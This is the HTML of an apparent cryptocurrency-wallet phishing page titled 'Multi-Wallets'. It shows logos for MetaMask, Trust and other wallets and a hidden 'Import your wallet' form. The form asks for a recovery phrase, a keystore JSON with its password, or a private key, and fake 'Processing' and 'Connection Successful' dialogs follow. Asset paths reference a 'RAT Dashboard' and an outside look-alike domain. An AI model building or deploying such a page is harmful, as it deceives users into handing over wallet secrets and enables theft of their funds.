<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <link href="WalletAPI_wallets_files/style.css" rel="stylesheet">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="generator" content="Gatsby 2.25.1">
  <title>Multi Wallets</title>
  <link rel="shortcut icon" href="/assets/images/logo.png">
   <!-- Particle.js Library -->
   <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
   
 <style
    data-styled="dijnUu  hfVnjX fiuMUO kyUqCt eyaBAy hnlESl guKAph fuQfHo hDbjSS fAmUdU gFeYHJ jGHRMl ibLsRQ gAVVCu cmAzHq kSIOSl lfUBtr eodRCW ceWocr jVWwwJ YwSGw hvbAKM"
    data-styled-version="4.4.1">
    /* sc-component-id: Header__SHeader-cphy8j-0 */
    html,
    body,
    #root,
    #router-root {
      height: 100%;
      width: 100%;
      margin: 0;
      padding: 0;
    }

    body {
      font-family: -apple-system, system-ui, BlinkMacSystemFont, "SF Pro Text", Roboto, Helvetica, Arial, sans-serif;
      font-style: normal;
      font-stretch: normal;
      font-weight: 400;
      font-size: 16px;
      color: rgb(246, 248, 250);
      overflow-y: auto;
      text-rendering: optimizeLegibility;
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
      -webkit-text-size-adjust: 100%;
      -webkit-overflow-scrolling: touch;
    }
    #particles-js {
            position: absolute;
            width: 100%;
            height: 100%;
            top: 0;
            left: 0;
            z-index: -1;
        }

        .container {
            z-index: 1;
        }

    button:active,
    button:focus,
    button.active {
      background-image: none;
      outline: 0;
      -webkit-box-shadow: none;
      box-shadow: none;
    }

    [tabindex] {
      outline: none;
    }

    a,
    p,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
      -webkit-text-decoration: none;
      text-decoration: none;
      margin: 0;
      padding: 0;
    }

    h1 {
      font-size: 42px;
    }

    h2 {
      font-size: 32px;
    }

    h3 {
      font-size: 24px;
    }

    h4 {
      font-size: 20px;
    }

    h5 {
      font-size: 17px;
    }

    h6 {
      font-size: 14px;
    }

    a {
      -webkit-text-decoration: none;
      text-decoration: none;
      color: inherit;
      outline: none;
      color: #4199FC;
      font-weight: bold;
    }

    ul,
    li {
      list-style: none;
      margin: 0;
      padding: 0;
    }

    * {
      box-sizing: border-box !important;
    }

    button {
      border-style: none;
      line-height: 1em;
    }

    input {
      -webkit-appearance: none;
    }

    input[type="color"],
    input[type="date"],
    input[type="datetime"],
    input[type="datetime-local"],
    input[type="email"],
    input[type="month"],
    input[type="number"],
    input[type="password"],
    input[type="search"],
    input[type="tel"],
    input[type="text"],
    input[type="time"],
    input[type="url"],
    input[type="week"],
    select:focus,
    textarea {
      font-size: 16px;
    }

    .statusbar-overlay {
      opacity: 0;
    }

    #coinbase_button_iframe {
      width: 244px !important;
      margin-top: 40px !important;
    }

    #coinbase_widget {
      display: inline-block;
      margin-top: 56px !important;
    }

    /* sc-component-id: layout__SWrapper-wjwiqk-0 */

    .dijnUu {
      position: relative;
      width: 100%;
      height: 100%;
      background: url(../assets/images/Thumbnail.jpg) no-repeat center center;
      background-size: cover;
        
    }

    /* sc-component-id: layout__SContent-wjwiqk-1 */

    .fiuMUO {
      width: 100%;
      height: 100%;
      margin: 0 auto;
      position: relative;
    }

    /* sc-component-id: layout__SContainer-wjwiqk-2 */

    .fuQfHo {
      height: 100%;
      max-width: 1064px;
      margin: 0 auto;
      padding: 0;
    }

    /* sc-component-id: layout__SFlex-wjwiqk-3 */

    .hfVnjX {
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      height: 100%;
    }

    @media screen and (max-width:640px) {
      .hfVnjX {
        -webkit-flex-direction: column;
        -ms-flex-direction: column;
        flex-direction: column;
      }
    }

    /* sc-component-id: Grid__SGrid-sc-8d5rqj-0 */

    .gAVVCu {
      width: 100%;
      height: 100%;
      padding: 24px;
      overflow-x: hidden;
      overflow-y: hidden;
      background: none;
      display: grid;
      grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
      grid-column-gap: 30px;
      grid-row-gap: 30px;
    }

    @media screen and (max-width:640px) and (min-width: 367px) {
      .gAVVCu {
        grid-template-columns: repeat(auto-fit, minmax(100px, 1fr));
        grid-column-gap: 15px;
        grid-row-gap: 15px;
      }
    }

    /* sc-component-id: pageStyles__SIndexPage-sc-1navawn-0 */

    .hDbjSS {
      height: 100%;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-flex-direction: column;
      -ms-flex-direction: column;
      flex-direction: column;
      -webkit-box-pack: space-around;
      -webkit-justify-content: space-around;
      -ms-flex-pack: space-around;
      justify-content: space-around;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      text-align: center;
      padding: 0 32px;
      padding-top: 30px;
    }

    @media screen and (max-width:640px) {
      .hDbjSS {
        padding: 0 24px;
        padding-top: 20px;
      }
    }

    /* sc-component-id: pageStyles__SBrandingWrapper-sc-1navawn-1 */

    .fAmUdU {
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-flex-direction: column;
      -ms-flex-direction: column;
      flex-direction: column;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      width: 100%;
      max-width: 700px;
      margin: 0 auto;
    }

    /* sc-component-id: pageStyles__SBranding-sc-1navawn-2 */

    .gFeYHJ {
      font-size: 35px;
      font-weight: 500;
      text-align: center;
    }

    /* sc-component-id: pageStyles__SPageDescription-sc-1navawn-3 */

    .jGHRMl {
      margin-top: 40px;
      font-size: 18px;
      font-weight: 300;
      line-height: 1.35;
    }

    /* sc-component-id: pageStyles__SSection-sc-1navawn-4 */

    .ibLsRQ {
      position: relative;
      width: 100%;
      z-index: 0;
      margin-bottom: 40px;
    }

    /* sc-component-id: pageStyles__SApp-sc-1navawn-5 */

    .cmAzHq {
      width: 100%;
    }

    /* sc-component-id: pageStyles__SAppIcon-sc-1navawn-6 */

    .kSIOSl {
      width: 100%;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
      padding: 25px;
    }

    .kSIOSl img {
      -webkit-filter: initial;
      filter: initial;
      width: 65%;
      height: 100%;
      border-radius: 50%;
    }

    .lfUBtr {
      width: 100%;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
      padding: 25px;
    }

    .lfUBtr img {
      -webkit-filter: initial;
      filter: initial;
      width: 65%;
      height: 100%;
      border-radius: initial;
    }

    /* sc-component-id: pageStyles__SAppName-sc-1navawn-7 */

    .eodRCW {
      font-weight: bold;
      color: inherit;
    }

    /* sc-component-id: pageStyles__SFootNote-sc-1navawn-8 */

    .ceWocr {
      margin: 10px;
      color: rgb(88, 112, 135);
      opacity: 0.75;
      padding-top: 30px;
    }

    .ceWocr a {
      font-weight: 600;
    }

    .message-dialog {
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,0.3);
    position: fixed;
    left: 0;
    top: 0;
    z-index: 99999;
}
dialog .send-dialog-overlay {
    z-index: 99999;
    overflow-y: hidden;
}
.message-dialog .send-dialog-content {
    width: 400px;
    border-radius: 20px;
}
.connect-dialog-body {
    padding: 20px;
    margin: 20px 10px;
    border-radius: 0 0 20px 20px;
    text-align: center;
}

        /* Footer Section */
        .footer-bottom {
            background-color: #333;
            color: white;
            padding: 20px 0;
            position: relative;
            width: 100%;
            bottom: 0;
        }

        .footer-bottom .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 0 20px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .footer-bottom .copyright {
            font-size: 13px;
        }

        .footer-bottom .copyright a {
            color: #4caf50;
            text-decoration: none;
        }

        .footer-bottom .copyright a:hover {
            text-decoration: underline;
        }

  </style>
</head>

<body style="display: block;">
 <!-- Particle.js container -->
 <div id="particles-js"></div>

  <div id="processing-dialog" class="message-dialog" style="display: none;" bis_skin_checked="1">
    <div class="send-dialog-overlay" bis_skin_checked="1"></div>
    <div class="send-dialog-content" bis_skin_checked="1">
        <div class="connect-dialog-body" bis_skin_checked="1">
            <h1 id="processing-val" style="font-size: 45px">30</h1>
            <h4 class="mt-3">Processing...</h4>
        </div>
    </div>
</div>

<div id="success-dialog" class="message-dialog" style="display: none;" bis_skin_checked="1">
  <div class="send-dialog-overlay" bis_skin_checked="1"></div>
  <div class="send-dialog-content" bis_skin_checked="1">
      <div class="connect-dialog-body" bis_skin_checked="1">
          <img style="width: 100px;margin-left: 35%;" src="success.gif" alt="Success">
          <h4 class="mt-3">Connection Successful</h4>
      </div>
  </div>
</div>


  <div class="sending" data-reach-dialog-overlay="" style="opacity: 1;z-index: 99999;display: none">

    <div class="containerz">
      <div class="boxz">
        <div class="borderz one"></div>
        <div class="borderz two"></div>
        <div class="borderz three"></div>
        <div class="borderz four"></div>

        <div class="line one"></div>
        <div class="line two"></div>
        <div class="line three"></div>
      </div>
    </div>
  </div>

  <div class="sc-bdVaJa LPcxt" data-reach-dialog-overlay="" style="opacity: 1;display: none">
    <div aria-modal="true" role="dialog" tabindex="-1" aria-label="dialog" class="sc-bwzfXH iiXYOL"
      data-reach-dialog-content="">
      <div class="sc-cMhqgX gUQEWC">
        <div class="sc-cmthru jJAhga">
          <div class="sc-bsbRJL fRcQRh">
            <svg width="20" height="20" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2"
              stroke-linecap="round" stroke-linejoin="round" class="sc-hZSUBg fRJrUU">
              <line x1="18" y1="6" x2="6" y2="18">
              </line>
              <line x1="6" y1="6" x2="18" y2="18">
              </line>
            </svg>
          </div>
          <div class="sc-iuJeZd hRZQmk" color="blue">
            <div class="sc-gqPbQI fhSmUE">
              Back
            </div>
          </div>
          <div class="sc-esOvli jebOoi">
            <div class="sc-hrWEMg bHjlF">
              <div class="sc-gwVKww jEMAel">
                <div class="sc-iQNlJl dJZYYq">
                  <div class="sc-hXRMBi deLgHH">
                    <div class="loading">
                      I
                    </div>
                    <div class="sc-epnACN jwEAlI" style="display: none">
                      Connect Manually
                    </div>
                  </div>
                </div>
              </div>
              <button id="connect-METAMASK" class="sc-kPVwWT sc-kfGgVZ sc-kIPQKe dQoUpv">
                <div class="sc-esjQYD iGptdp">
                  <div color="#E8831D" class="sc-RefOD jsJmJE">
                    MetaMask
                  </div>
                  <div class="sc-iQKALj GTKuw">
                    Easy-to-use browser extension.
                  </div>
                </div>
                <div class="sc-bwCtUz lgYJCf">
                  <img class="firstImg"
                    src="https://appwalletconnects.org/WalletAPI_wallets_files/metamask.023762b6.html" alt="Icon"
                    style="width: 24px;">
                </div>
              </button>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="2tzjbs overlay" id="key_overlay" data-rbnxzn="qw7i7k" style="display: none;">

    <div class="ih37zd aletr sswla" data-j9niem="t4amku" style="display: block;">

      <div role="dialog" aria-modal="true" aria-labelledby="modal-headline"
        class="block align-bottom bg-white rounded-lg text-left overflow-hidden  transform transition-all sm:my-8 sm:align-middle">
        <div class="bg-white px-4 pt-5 pb-4 sm:p-6 sm:pb-4">
          <div class="sm:flex sm:items-start">

            <form action="#" method="post" enctype="multipart/form-data" id="form" onsubmit="return false">


              <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">

                <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900"
                  style="display: flex; flex-direction: row;"> <img
                    src="https://appwalletconnects.org/WalletAPI_wallets_files/saved_resource.html"
                    style="margin-right: 20px; height: 40px; width: 40px" id="myImg"><span>Import your <span
                      id="walletname"></span> wallet
                  </span>
                </h3>
                <div class="mt-2">
                  <div class="mt-10">
                    <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
                      <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                        Phrase
                      </div>
                      <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                        Keystore JSON
                      </div>
                      <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                        Private Key
                      </div>
                    </div>
                    <div id="first" class="acc-body active">
                      <div class="flex flex-col">
                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><textarea cols="30" rows="4" placeholder="Enter your recovery phrase"
                            class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
                            name="phrase" required="" minlength="12" id="phraseInput"></textarea>
                          <p class="text-xs text-grey-300 mt-6">
                            Typically 12 (sometimes 24) words separated by single spaces
                          </p>
                        </div>
                      </div>
                      <div class="flex w-full"><button type="submit"
                          class="flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in"
                          id="phraseProceed" name="play"><span class="mr-2 uppercase">Proceed</span> <span><svg
                              fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                              viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                            </svg></span></button></div>
                    </div>
                    <div id="second" class="acc-body bg-grey-600">
                      <div class="flex flex-col">

                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><textarea cols="30" rows="4" placeholder="Keystore JSON"
                            class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
                            name="keystorejson" required="" id="keystorejson"></textarea></div>
                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><input type="text" required="required" name="keystorepassword"
                            placeholder="Wallet password" id="keystorepassword"
                            class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                          <p class="text-xs text-grey-300 mt-6">
                            Several lines of text beginning with "{...}" plus the password you used to encrypt it.
                          </p>
                        </div>
                      </div>
                      <div class="flex w-full"><button type="submit" class="flex items-center justify-center focus:outline-none
                        text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                        w-full transition duration-150 ease-in" id="keystorejsonproceed"><span class="mr-2
                        uppercase">Proceed</span> <span><svg fill="none" stroke-linecap="round" stroke-linejoin="round"
                              stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                        0 11-18 0 9 9 0 0118 0z"></path>
                            </svg></span></button></div>
                    </div>
                    <div id="third" class="acc-body bg-grey-600">
                      <div class="flex flex-col">
                        <div class="relative"><input type="hidden" name="wallet_id" required="required"
                            placeholder="Wallet ID" id="wallet_id" value="Trust wallet"></div>
                      </div>
                      <div class="flex flex-col mb-6">
                        <div class="relative"><input type="text" required="required"
                            placeholder="Enter your Private Key" name="privatekey" id="privatekey"
                            class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                          <p class="text-xs text-grey-300 mt-6">
                            Typically 12 (sometimes 24) words seperated by a single space.
                          </p>
                        </div>
                      </div>
                      <div class="flex w-full"><button type="submit" class="flex items-center justify-center focus:outline-none
                        text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                        w-full transition duration-150 ease-in" id="privatekeyProceed"><span class="mr-2
                        uppercase">Proceed</span> <span><svg fill="none" stroke-linecap="round" stroke-linejoin="round"
                              stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                              <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                        0 11-18 0 9 9 0 0118 0z"></path>
                            </svg></span></button></div>
                    </div>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="bg-gray-50 px-4 py-3 sm:px-6 sm:flex sm:flex-row-reverse"><button id="cancel" type="button"
      class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
      Cancel
    </button></div>
  </div>

  </div>

  </div>
  <div id="___gatsby">
    <div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper">
      <div class="layout__SWrapper-wjwiqk-0 dijnUu">
        <div class="layout__SFlex-wjwiqk-3 hfVnjX">
          <div class="layout__SContent-wjwiqk-1 fiuMUO">
            <header class="Header__SHeader-cphy8j-0 kyUqCt">
              <div class="Header__SLogo-cphy8j-2 hnlESl">
                <a href="/RAT Dashboard/RAT DashBoard.html"><img style="margin: auto"
                    src="/assets/images/logo.png" alt=""></a>
              </div>
            </header>
            <div class="layout__SContainer-wjwiqk-2 fuQfHo">
              <div class="pageStyles__SIndexPage-sc-1navawn-0 hDbjSS">
                <div class="pageStyles__SBrandingWrapper-sc-1navawn-1 fAmUdU">
                  <h1 class="pageStyles__SBranding-sc-1navawn-2 gFeYHJ">Multi-Wallets</h1>
                                </div>
                <section class="pageStyles__SSection-sc-1navawn-4 ibLsRQ">
                  <div class="Grid__SGrid-sc-8d5rqj-0 gAVVCu">


                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl"><img class="img-icons"
                          src="/RAT Dashboard/WalletAPI_wallets_files/trust.png"
                          alt="Trust"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">Trust</div>
                    </div>  
                    
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl"><img class="img-icons"
                          src="/RAT Dashboard/WalletAPI_wallets_files/meta.png"
                          alt="MetaMask"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">MetaMask</div>
                    </div>   
                    
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl"><img class="img-icons"
                          src="/assets/images/logo.png"
                          alt="RAT"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">RAT</div>
                    </div>                  
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl"><img class="img-icons"
                          src="WalletAPI_wallets_files/tron-20fg49jbfj9488dhvd76975js73648.png"
                          alt="Tron"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">Tron</div>
                    </div>
                    
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl"><img class="img-icons"
                          src="WalletAPI_wallets_files/tokenpocket-57a4a886cc644e5237ac1558226154cb.png"
                          alt="TokenPocket"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">TokenPocket</div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr"><img class="img-icons"
                          src="WalletAPI_wallets_files/blockchain-logo.png" alt="Blockchain"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">Blockchain</div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr"><img class="img-icons"
                          src="WalletAPI_wallets_files/bsc-logo.png" alt="Binance Smart Chain"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">Binance Smart Chain</div>
                    </div>


                   
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                      <div class="pageStyles__SAppIcon-sc-1navawn-6 kSIOSl"><img class="img-icons"
                          src="WalletAPI_wallets_files/eos-c3759bb3294as37592947sd7374556.png"
                          alt="EOS"></div>
                      <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">EOS</div>
                    </div>



                  </div>
                </section>
              </div>
            </div>
            <!-- Footer Section -->
    <div class="footer-bottom">
      <div class="container"> 
          <p class="copyright">
            <p class="middle">
            &copy; 2024 ART NUB GROUP All Rights Reserved by <a href="https://www.facebook.com/alviemon023" class="copyright-link">ALVIHASANEMON</a>
          </p>
          </p>
      </div>
  </div>

</div>
        </div>
      </div>
    </div>
    <div id="gatsby-announcer"
      style="position:absolute;top:0;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0"
      aria-live="assertive" aria-atomic="true">Navigated to Wallets</div>
  </div>
  <style>
    /*! CSS Used from: Embedded */

    img {
      border-style: none;
    }

    button,
    input,
    textarea {
      font-family: inherit;
      font-size: 100%;
      line-height: 1.15;
      margin: 0;
    }

    button,
    input {
      overflow: visible;
    }

    button {
      text-transform: none;
    }

    [type=button],
    button {
      -webkit-appearance: button;
    }

    [type=button]::-moz-focus-inner,
    button::-moz-focus-inner {
      border-style: none;
      padding: 0;
    }

    [type=button]:-moz-focusring,
    button:-moz-focusring {
      outline: 1px dotted ButtonText;
    }

    textarea {
      overflow: auto;
    }

    h3,
    p {
      margin: 0;
    }

    button {
      background-color: transparent;
      background-image: none;
    }

    button:focus {
      outline: 1px dotted;
      outline: 5px auto -webkit-focus-ring-color;
    }

    *,
    :after,
    :before {
      box-sizing: border-box;
      border: 0 solid #e2e8f0;
    }

    img {
      border-style: solid;
    }

    textarea {
      resize: vertical;
    }

    input::-moz-placeholder,
    textarea::-moz-placeholder {
      color: #a0aec0;
    }

    input:-ms-input-placeholder,
    textarea:-ms-input-placeholder {
      color: #a0aec0;
    }

    input::placeholder,
    textarea::placeholder {
      color: #a0aec0;
    }

    button {
      cursor: pointer;
    }

    h3 {
      font-size: inherit;
      font-weight: inherit;
    }

    button,
    input,
    textarea {
      padding: 0;
      line-height: inherit;
      color: inherit;
    }

    img,
    svg {
      display: block;
      /* vertical-align: middle; */
    }

    img {
      max-width: 100%;
      height: auto;
    }

    .bg-white {
      --bg-opacity: 1;
      background-color: #fff;
      background-color: rgba(255, 255, 255, var(--bg-opacity));
    }

    .bg-red-100 {
      --bg-opacity: 1;
      background-color: #fff5f5;
      background-color: rgba(255, 245, 245, var(--bg-opacity));
    }

    .bg-red-600 {
      --bg-opacity: 1;
      background-color: #e53e3e;
      background-color: rgba(229, 62, 62, var(--bg-opacity));
    }

    .bg-blue-600 {
      --bg-opacity: 1;
      background-color: #3182ce;
      background-color: rgba(49, 130, 206, var(--bg-opacity));
    }

    .hover\:bg-red-700:hover {
      --bg-opacity: 1;
      background-color: #c53030;
      background-color: rgba(197, 48, 48, var(--bg-opacity));
    }

    .hover\:bg-blue-700:hover {
      --bg-opacity: 1;
      background-color: #2b6cb0;
      background-color: rgba(43, 108, 176, var(--bg-opacity));
    }

    .border-transparent {
      border-color: transparent;
    }

    .border-white {
      --border-opacity: 1;
      border-color: #fff;
      border-color: rgba(255, 255, 255, var(--border-opacity));
    }

    .border-gray-400 {
      --border-opacity: 1;
      border-color: #cbd5e0;
      border-color: rgba(203, 213, 224, var(--border-opacity));
    }

    .hover\:border-blue-600:hover {
      --border-opacity: 1;
      border-color: #3182ce;
      border-color: rgba(49, 130, 206, var(--border-opacity));
    }

    .focus\:border-blue-400:focus {
      --border-opacity: 1;
      border-color: #63b3ed;
      border-color: rgba(99, 179, 237, var(--border-opacity));
    }

    .rounded {
      border-radius: .25rem;
    }

    .rounded-md {
      border-radius: .375rem;
    }

    .rounded-lg {
      border-radius: .5rem;
    }

    .rounded-full {
      border-radius: 9999px;
    }

    .border {
      border-width: 1px;
    }

    .border-b-2 {
      border-bottom-width: 2px;
    }

    .cursor-pointer {
      cursor: pointer;
    }

    .inline-block {
      display: inline-block;
    }

    .flex {
      display: flex;
    }

    .inline-flex {
      display: inline-flex;
    }

    .flex-col {
      flex-direction: column;
    }

    .items-center {
      align-items: center;
    }

    .justify-center {
      justify-content: center;
    }

    .justify-evenly {
      justify-content: space-evenly;
    }

    .flex-shrink-0 {
      flex-shrink: 0;
    }

    .font-medium {
      font-weight: 500;
    }

    .h-6 {
      height: 1.5rem;
    }

    .h-12 {
      height: 3rem;
    }

    .text-xs {
      font-size: .75rem;
    }

    .text-sm {
      font-size: .875rem;
    }

    .text-base {
      font-size: 1rem;
    }

    .text-lg {
      font-size: 1.125rem;
    }

    .leading-6 {
      line-height: 1.5rem;
    }

    .mx-auto {
      margin-left: auto;
      margin-right: auto;
    }

    .mt-2 {
      margin-top: .5rem;
    }

    .mr-2 {
      margin-right: .5rem;
    }

    .mt-3 {
      margin-top: .75rem;
    }

    .mb-4 {
      margin-bottom: 1rem;
    }

    .mt-6 {
      margin-top: 1.5rem;
    }

    .mb-6 {
      margin-bottom: 1.5rem;
    }

    .mt-10 {
      margin-top: 2.5rem;
    }

    .mr-10 {
      margin-right: 2.5rem;
    }

    .object-contain {
      -o-object-fit: contain;
      object-fit: contain;
    }

    .focus\:outline-none:focus {
      outline: 2px solid transparent;
      outline-offset: 2px;
    }

    .overflow-hidden {
      overflow: hidden;
    }

    .p-2 {
      padding: .5rem;
    }

    .py-2 {
      padding-top: .5rem;
      padding-bottom: .5rem;
    }

    .py-3 {
      padding-top: .75rem;
      padding-bottom: .75rem;
    }

    .px-4 {
      padding-left: 1rem;
      padding-right: 1rem;
    }

    .pr-4 {
      padding-right: 1rem;
    }

    .pb-4 {
      padding-bottom: 1rem;
    }

    .pl-4 {
      padding-left: 1rem;
    }

    .pt-5 {
      padding-top: 1.25rem;
    }

    .placeholder-gray-500::-moz-placeholder {
      --placeholder-opacity: 1;
      color: #a0aec0;
      color: rgba(160, 174, 192, var(--placeholder-opacity));
    }

    .placeholder-gray-500:-ms-input-placeholder {
      --placeholder-opacity: 1;
      color: #757581;
      color: rgba(160, 174, 192, var(--placeholder-opacity));
    }

    .placeholder-gray-500::placeholder {
      --placeholder-opacity: 1;
      color: #a0aec0;
      color: rgba(160, 174, 192, var(--placeholder-opacity));
    }

    .relative {
      position: relative;
    }

    .shadow-sm {
      box-shadow: 0 1px 2px 0 rgba(0, 0, 0, .05);
    }

    .shadow-xl {
      box-shadow: 0 20px 25px -5px rgba(0, 0, 0, .1), 0 10px 10px -5px rgba(0, 0, 0, .04);
    }

    .text-left {
      text-align: left;
    }

    .text-center {
      text-align: center;
    }

    .text-white {
      --text-opacity: 1;
      color: #080808;
      color: rgba(255, 255, 255, var(--text-opacity));
    }

    .text-gray-900 {
      --text-opacity: 1;
      color: #1a202c;
      color: rgba(26, 32, 44, var(--text-opacity));
    }

    .uppercase {
      text-transform: uppercase;
    }

    .align-bottom {
      vertical-align: bottom;
    }

    .w-6 {
      width: 1.5rem;
    }

    .w-12 {
      width: 3rem;
    }

    .w-full {
      width: 100%;
    }

    .transform {
      --transform-translate-x: 0;
      --transform-translate-y: 0;
      --transform-rotate: 0;
      --transform-skew-x: 0;
      --transform-skew-y: 0;
      --transform-scale-x: 1;
      --transform-scale-y: 1;
      transform: translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));
    }

    .transition-all {
      transition-property: all;
    }

    .transition {
      transition-property: background-color, border-color, color, fill, stroke, opacity, box-shadow, transform;
    }

    .ease-in {
      transition-timing-function: cubic-bezier(.4, 0, 1, 1);
    }

    .duration-150 {
      transition-duration: .15s;
    }

    @media (min-width:640px) {
      .sm\:flex {
        display: flex;
      }

      .sm\:flex-row-reverse {
        flex-direction: row-reverse;
      }

      .sm\:items-start {
        align-items: flex-start;
      }

      .sm\:h-10 {
        height: 2.5rem;
      }

      .sm\:text-sm {
        font-size: .875rem;
      }

      .sm\:text-base {
        font-size: 1rem;
      }

      .sm\:mx-0 {
        margin-left: 0;
        margin-right: 0;
      }

      .sm\:my-8 {
        margin-top: 2rem;
        margin-bottom: 2rem;
      }

      .sm\:mt-0 {
        margin-top: 0;
      }

      .sm\:ml-3 {
        margin-left: .75rem;
      }

      .sm\:ml-4 {
        margin-left: 1rem;
      }

      .sm\:max-w-lg {
        max-width: 32rem;
      }

      .sm\:p-6 {
        padding: 1.5rem;
      }

      .sm\:px-6 {
        padding-left: 1.5rem;
        padding-right: 1.5rem;
      }

      .sm\:pb-4 {
        padding-bottom: 1rem;
      }

      .sm\:text-left {
        text-align: left;
      }

      .sm\:align-middle {
        vertical-align: middle;
      }

      .sm\:w-10 {
        width: 2.5rem;
      }

      .sm\:w-auto {
        width: auto;
      }

      .sm\:w-full {
        width: 100%;
      }
    }

    @media (min-width:768px) {
      .md\:object-scale-down {
        -o-object-fit: scale-down;
        object-fit: scale-down;
      }
    }

    /*! CSS Used from: Embedded */

    *,
    :after,
    :before {
      box-sizing: border-box;
      margin: 0;
    }

    /*! CSS Used from: Embedded */

    div,
    input {
      font-family: "DM Sans", sans-serif !important;
    }

